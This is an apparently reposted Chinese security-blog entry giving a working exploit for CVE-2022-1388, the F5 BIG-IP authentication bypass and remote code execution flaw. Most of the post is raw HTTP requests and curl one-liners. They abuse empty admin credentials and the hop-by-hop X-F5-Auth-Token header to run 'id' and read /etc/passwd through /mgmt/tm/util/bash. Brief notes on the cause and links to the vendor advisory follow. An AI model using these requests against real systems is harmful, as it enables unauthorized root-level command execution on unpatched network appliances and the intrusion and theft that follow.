CVE-2022-1388(F5 BIG-IP Remote Code Execution)

渗透技巧 2年前 (2022) admin
675 0 0

exp:

# F5 BIG-IP RCE exploitation (CVE-2022-1388)
POST (1):
POST /mgmt/tm/util/bash HTTP/1.1Host: <redacted>:8443Authorization: Basic YWRtaW46Connection: keep-alive, X-F5-Auth-TokenX-F5-Auth-Token: 0
{"command": "run" , "utilCmdArgs": " -c 'id' " }
curl commandliner:
$ curl -i -s -k -X $'POST'-H $'Host: <redacted>:8443' -H $'Authorization: Basic YWRtaW46' -H $'Connection: keep-alive, X-F5-Auth-Token' -H $'X-F5-Auth-Token: 0' -H $'Content-Length: 52' --data-binary $'{"command": "run" , "utilCmdArgs": " -c 'id' " }x0dx0a'$'https://<redacted>:8443/mgmt/tm/util/bash' --proxy http://127.0.0.1:8080

POST (2):
POST /mgmt/tm/util/bash HTTP/1.1Host: <redateced>:8443Authorization: Basic YWRtaW46Connection: keep-alive, X-F5-Auth-TokenX-F5-Auth-Token: 0
{"command": "run" , "utilCmdArgs": " -c ' cat /etc/passwd' " }
curl commandliner:
$ curl -i -s -k -X $'POST'-H $'Host: <redacted>:8443' -H $'Authorization: Basic YWRtaW46' -H $'Connection: keep-alive, X-F5-Auth-Token' -H $'X-F5-Auth-Token: 0'--data-binary $'{"command": "run" , "utilCmdArgs": " -c ' cat /etc/passwd' " }x0dx0ax0dx0a'$'https://<redacted>/mgmt/tm/util/bash' --proxy http://127.0.0.1:8080
Note:
Issue could be related between frontend and backend authentication "Jetty" with empty credentials "admin: <empty>" + value of headers ,see "HTTP hop_by_hop request headers"...
References and Fixes :* https://support.f5.com/csp/article/K23605346* https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1388
Here the documentation used latest nites:* https://clouddocs.f5.com/api/icontrol-rest/
HTTP hop_by_hop request headers: * https://portswigger.net/research/top-10-web-hacking-techniques-of-2019-nominations-open
# AuthorAlex Hernandez aka @_alt3kx_


原文始发于微信公众号(暗影安全):CVE-2022-1388(F5 BIG-IP Remote Code Execution)

版权声明:admin 发表于 2022年7月31日 上午9:01。
转载请注明:CVE-2022-1388(F5 BIG-IP Remote Code Execution) | CTF导航

相关文章

暂无评论

您必须登录才能参与评论!
立即登录
暂无评论...